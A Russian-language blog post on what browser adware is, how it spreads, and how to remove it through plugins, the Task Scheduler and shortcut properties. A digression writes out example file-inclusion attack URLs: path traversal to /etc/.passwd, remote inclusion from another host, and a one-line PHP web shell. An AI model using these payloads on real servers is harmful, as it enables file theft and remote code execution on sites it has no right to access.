Как убрать рекламу в браузере


Как избавиться от рекламы в браузере

Adware — программное обеспечение, целью которого является показ рекламных объявлений в рамках используемого браузера на локальном компьютере пользователя.

AdWare-not-a-virus

Adware может включать в себя достаточно широкий функционал, вплоть до отправки результатов шпионской деятельности с зараженного компьютера.

Цели у рекламных приложений самые банальные — это получение дохода от показа рекламных объявлений.

Устанавливается сие программное обеспечение с согласия самого пользователя, хотя в некоторых случаях установка AdWare приложений, может происходить и без явного уведомления последнего.

Обычно adware добавляется в установочные файлы-обертки и прочие инсталляторы, а также может маскироваться под различные самораспаковывающиеся архивы.

После установки AdWare приложение добавляет в каждый браузер специализированный плагин, который в свою очередь подгружает рекламные баннеры в просматриваемые веб страницы.

Плагину, который имеет локальный доступ к браузеру это сделать совершенно не сложно. Для проверки можно открыть любой сайт в браузере, и вбить в урл:

javascript:alert(document.domain);

Таким образом, AdWare плагин имеет возможность проводить JS инъекции в DOM модель абсолютно любой веб страницы.

Но существуют и более агрессивные методы для установки AdWare приложений. В частности злоумышленник может использовать найденную уязвимость на сайте для несанкционированной загрузки и установки рекламного ПО.

Эта технология имеет свое название Browser Hijackers, и использует в основном уязвимости ОС и браузеров.

Шаг в сторону.

Классика.. или откуда в 21 веке появились динозавры?

Буквально сегодня на работе мне понадобилось найти некоторую информацию в сети интернет, и вот в процессе поиска я натолкнулся на один с виду ни чем не примечательный, самописный сайт.

Самописца спалил неудачно формирующийся урл.

sites.com/index.php?body=page.htm&id=4

Отсутствие корректной проверки (а скорее всего не проинициализированной [значением по умолчанию] переменной $body) позволило не только посмотреть файлы на сервере, включая PHP скрипты самого веб сайта:

sites.com/index.php?body=.htaccess&id=3
sites.com/index.php?body=../../../../../etc/.passwd&id=2

Уязвимая переменная PHP

Но и подключать удаленные файлы:

sites.com/index.php?body=http://otherhost.com/robots.txt&id=0

а возможно и выполнять системные команды:

/*robots.txt*/ <? system($_GET[‘cmd‘]); ?>
sites.com/index.php?body=http://otherhost.com/robots.txt&cmd=ls&id=10

Признаться честно, такого я уже давно не встречал, и на минуту мне даже показалось что это сон, но дабы развеять сомнения, быстро ущипнул себя за нос, и сделал глубокий выдох. 😀

Уязвимость Remote File Inclusion (RFI) это прямой путь к Remote Code Execution (RCE) т. е. удаленному выполнению кода на сервере.

Говоря простыми словами в тему статьи, как минимум у данного сайта, а как максимум и всех его соседей по серверу, есть все шансы стать рассадником adware. Но, т. к. времени на анализ исходников и дальнейшее тестирование у меня не было, я просто отправил письмо админу с указанием явного бага. 😉

Мне уже неоднократно приходилось быть свидетелем того, как совершенно безобидные сайты пытались подгрузить троянов вида Trojan.Hosts, а также различных Trojan.MBRlock и Trojan.Winlock, с целью блокировки компьютера за просмотр не совсем этичных материалов и последующего вымогательства денежных средств.

Но если хорошие антивирусы хоть как-то реагируют на вышеописанных троянов, то большинство adWare классифицируют, как not-a-virus:adware.win32, и по умолчанию оставляют в покое, позволяя выполнять свое грязное дело.

На этом описание причин попадания рекламы в браузеры можно условно считать законченным, и перейти к процессу удаления рекламы в браузерах. В зависимости от разновидности и функционала адваре, мне известно несколько способов, как можно избавиться  от рекламы в браузере.

Что делать, если всплывает реклама в браузере?

1. Простой способ убрать рекламу в браузере.

Примитивное adware приложение с позволения пользователя устанавливается в Program Files (ProgramData) или любую другую папку на локальном жестком диске прописывается в автозагрузку. Причем данное ПО может показывать всплывающую рекламу не только в браузере, но и просто на рабочем столе.

Также это приложение следит за тем, чтобы в браузере постоянно находился активированный плагин отвечающий за показ всплывающей рекламы.

В данном случае для того, чтобы удалить всплывающую рекламу из браузера, достаточно найти и отключить подозрительный плагин (может называться как угодно), а также деинсталировать само AdWare приложение, которое можно найти через установку и удаление программ.

2. Вариант немного посложнее.

Хитрое adWare приложение записывается в одну из директорий с которыми работают браузеры: c:\Users\username\AppData\Roaming (%appdata%), c:\Users\username\AppData\Local (%localappdata%) и стартует через планировщик заданий. После проверки работоспособности плагина, может корректно завершиться и выгрузиться из памяти. 😀

Алгоритм удаления всплывающей рекламы в таком случае следующий:

a) Находим причину:

1. Открываем планировщик заданий: Win+R => Taskschd.msc

2. Ищем подозрительный процесс, записываем путь, отключаем запуск, удаляем (называться может как угодно, хоть Microsoft.exe) not-a-virus-adware.win32.exe.

b) Исправляем следствие:

3. Отключаем и удаляем плагин показывающий рекламу из браузера.

3. Форсмажоры.

Достаточно часто различные not-a-virus:adware подменяют стартовую страницу, дописывая в свойства ярлыков:

"C:\Program Files\Opera\Opera.exe" start.webalta.ru

Так например делает not-a-virus:Downloader.Win32.Walta и многие другие. В таких случаях нужно открыть свойства ярлыка и удалить из поля объект, строку: home.webalta.ru.

О том, как удалить назойливую поисковую систему Webalta, я уже писал здесь.

P.S. Надеюсь эта статья о удалении рекламы из браузеров пойдет кому-то на пользу, а также хочу поздравить всех с Наступающим Новым Годом, и пользуясь случаем пожелать сохранение бдительности даже в эти новогодние праздники!

😉